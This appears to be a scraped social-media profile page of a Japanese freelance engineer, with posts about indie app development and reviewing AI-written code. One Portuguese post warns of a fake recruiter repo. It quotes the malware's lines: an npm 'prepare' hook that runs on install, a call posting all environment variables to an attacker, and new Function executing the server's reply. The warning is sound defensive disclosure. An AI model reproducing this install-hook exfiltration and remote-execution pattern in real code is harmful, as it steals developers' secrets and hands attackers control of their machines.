バイブス父さん|AI×外部CTO×1600万円フリーランス
185 posts

バイブス父さん|AI×外部CTO×1600万円フリーランス
@hiro_progra0524
現役フリーランスエンジニアで年商1600万円突破 | AIめちゃくちゃ勉強中 | SEO直轄AIアドバイザーとして経営層向けのAI活用術アドバイスを行う | SIerの外部CTOも兼務 | 休日はα7M4で子供撮影したり戯れ中 | Superwhisper愛用中

審査出す前に パクリアプリ出されそう

本当に来年から副業禁止だから、今あるアプリを誰かに譲渡するか、広告と課金を全部剥がすかの二択だ 全剥がしが正解かもなぁ


AIによるコーディングって、せいぜいここ2、3年の話じゃん?10年くらいエンジニアやってる人ならそれまでの7年位は人力でソース書いてたはずじゃん?そのときにさ、「ソース確認しといてよかったー!!」って経験、一度や二度じゃないはずなんだよ。 例えば開発メンバーの誰かがコミットしたソースを眺めていて「んっ?」て違和感を感じたことない?なんでここに差分でてんの?とか、絶対経験あるはずなんだよね。それで不具合を未然に防いだ経験とか。 それなのになぜ、人からAIに変わっただけでその行為をしなくなる?AIが優秀だから?コンテキスト管理や自動テストしてるから? それは過信だと思うよ。別に全部見ろとは言わないよ、でも複雑な修正や業務影響の大きい修正をしたときくらいは、どこに修整が入っているかくらいは確認すべきだよ、そういう習慣は持っておくべきだよ

個人開発、作り始めは楽しいけど途中でモチベーションが落ちてくるのあるある? 反応がなかったり壁にぶつかったりすると特に辛い… みんなどうやって乗り越えてますか?

AIで簡単にアプリ作れるようになったと言うけど 実際そんなに簡単ではない

数年前の就活なら 「Githubに草生やしてます! Webアプリの開発しました! システム開発してます!」 これで無双できたのに、 今の子たちは可哀想だな。。😢

「AIはなんか信用ならん」 って理由でAI使っていないITエンジニアさんっているのかな?なんて思ってたけど AIに指示する「開発に必要な情報」を自分で考えれない人がAIを使わないITエンジニアの大半をしめるのではないだろうか? このタイプの人は焦った所でもう遅い

今のアプリの進捗です! 今は大学生のための普通の家計簿の機能+シフト管理、扶養計算ができるようなアプリを作ってます。 #個人開発 #SwiftUI #家計簿アプリ #大学生の日常

実務始めて実感してることがあって、エンジニア全員が技術への感度が高くて上昇志向なわけじゃない。 Xに出てくる人はかなり上澄み。 だからXで他人と比べて落ち込まなくていいし、外部との接点を持って自分の技術力を俯瞰する仕組みを作った方がいいんだよな。

⚠️ Devs, parem tudo e leiam. Quase rodei malware na minha máquina agora mesmo e quero que vocês saibam exatamente como funciona o golpe. Recebi um link de um repo no GitHub: um "MVP" de um projeto web3/poker, com pedido pra clonar e rodar localmente. Visual de teste técnico, daqueles que recruiter manda. Antes de tocar em qualquer coisa, parei e li o código pelo próprio GitHub, sem clonar. Bem que desconfiei. Era malware. E não um qualquer — tinha DOIS payloads que executam SOZINHOS, sem você rodar nada explicitamente. 🎯 Payload 1 — dispara no `npm install` O `package.json` tinha `"prepare": "node server/server.js"`. O detalhe maldoso: o script `prepare` roda AUTOMÁTICO toda vez que você dá `npm install`. Dentro dele, escondido nas rotas do servidor, um: `axios.post(url, { ...process.env })` Ou seja: ele empacota TODAS as suas variáveis de ambiente — chaves de AWS, tokens de API, secrets, seed phrase de carteira cripto — e manda pro servidor do atacante. E não para aí: a RESPOSTA do servidor é passada pra `new Function("require", resposta)(require)`. Isso é execução de código arbitrário, com acesso total ao Node: filesystem, child_process, rede. Ele pode roubar suas chaves SSH, instalar persistência, o que quiser. A URL do atacante? Escondida em base64 no `.env`, decodificando pra um domínio na Vercel. Disfarce em cima de disfarce.


5年後の小学校では じゃあこれからClaude codeを使って、オリジナルのアプリを作ってみよう! みたいな授業あったらいいな

バイブコーディングあるある、AIが作業用に作ったスクリプトや残骸が残る。

自分が作ったアプリがバズることを夢見る。 このワクワクがあるだけで個人開発をやる意義がある。

